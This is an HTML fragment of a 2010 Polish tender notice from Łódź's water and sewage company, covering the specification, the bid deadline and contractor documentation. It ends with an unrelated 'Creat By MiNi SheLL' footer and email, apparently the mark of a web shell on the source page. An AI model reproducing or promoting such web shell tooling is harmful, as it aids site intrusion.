<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZWiK Sp. z o.o. 90-133 Łódź, ul. Wierzbowa 52, pok. A- 218 lub otrzymać pocztą na wniosek wykonawcy  za zaliczeniem pocztowym.
Cena SIWZ wynosi   58 PLN + koszt przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2010 godzina 10:30, miejsce: Zakład Wodociągów i Kanalizacji Sp. z o.o. 90-133 Łódź, ul. Wierzbowa 52, budynek A, pokój nr 132 (kancelaria), która pracuje w dni robocze od poniedziałku do piątku w godz. 8-16..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Formalności jakie powinny być dopełnione przez Wykonawcę po wyborze oferty w celu zawarcia umowy.
Wybrany Wykonawca przed podpisaniem umowy zobowiązany jest złożyć Pełnomocnikowi zamawiającego niżej wymienione dokumenty :
1.	W przypadki osoby fizycznej aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli posiada taki wpis.
2.	Uprawnienia  kierownika budowy oraz kierowników robót, o których mowa w rozdziale VI pkt.1.3) SIWZ.
Do wskazanych wyżej uprawnień, Wykonawca winien załączyć aktualne zaświadczenia o wpisie na listę właściwej izby samorządu zawodowego ( nie dotyczy osoby, o której mowa w rozdz. VI pkt.1.3) C SIWZ).
3.	Wykonawca jako wytwórca odpadów ( w tym mas ziemnych ) zobowiązany jest złożyć  stosowne (odpowiednie) dokumenty określone w art. 17 ust. 1 pkt.1 i 2 ustawy z dnia 27 kwietnia 2001r. o odpadach ( Dz. U. 2007 nr 39, poz. 251 ze zm.) tj.  :
- w przypadku wytwarzania odpadów niebezpiecznych w ilości powyżej 0,1 Mg rocznie
- decyzję zatwierdzającą program gospodarki odpadami niebezpiecznymi,
- w przypadku wytwarzania odpadów niebezpiecznych w ilości do 0,1 Mg rocznie 
albo powyżej 5 Mg rocznie odpadów innych niż niebezpieczne - informację o wytwarzanych odpadach oraz o sposobie gospodarowania odpadami.
 4. Polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia
     w kwocie co najmniej 400 000,00 zł . 
     Wykonawca ma obowiązek zapewnić ważność ubezpieczenia na okres trwania umowy o udzielenie niniejszego
     zamówienia publicznego.
Uwaga
Dokumenty wymienione powyżej w pkt.1-4 mogą być złożone w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.


5.  Wykonawcy występujący wspólnie :
a)	     wykonawcy wspólnie ubiegający się o udzielenie zamówienia przed podpisaniem umowy w sprawie zamówienia publicznego są zobowiązani do zawarcia między sobą umowy regulującej ich współpracę i dostarczenia jej  Zamawiającemu w terminie wskazanym  w piśmie powiadamiającym o wyborze oferty. Umowa ta w swojej treści musi zawierać co najmniej następujące postanowienia :
-wyszczególnienie wykonawców wspólnie ubiegających się o udzielenia zamówienia (podmioty składające wspólną ofertę),
-określenie celu gospodarczego, dla którego umowa została zawarta (celem tym musi być zrealizowanie przedmiotu zamówienia ),
-wskazanie lidera do ich reprezentowania i zawarcia umowy o ile  to nie wynika z dokumentów przedłożonych do oferty, 
-zapis mówiący, że wszyscy wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie, niewykonanie lub nienależyte wykonanie umowy,
-umowa musi być zawarta na czas nie krótszy niż okres realizacji zamówienia oraz okres udzielonej rękojmi i gwarancji jakości,
-zapis mówiący, że lider jest upoważniony do otrzymywania płatności i wszelkiej korespondencji,
- zapis mówiący, że żaden z wykonawców wchodzących w skład podmiotu wspólnego nie może scedować swoich praw i obowiązków wynikających z zawartej umowy na osoby trzecie bez zgody Inwestora.
                 Umowa podmiotów występujących wspólnie winna być złożona w oryginale..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com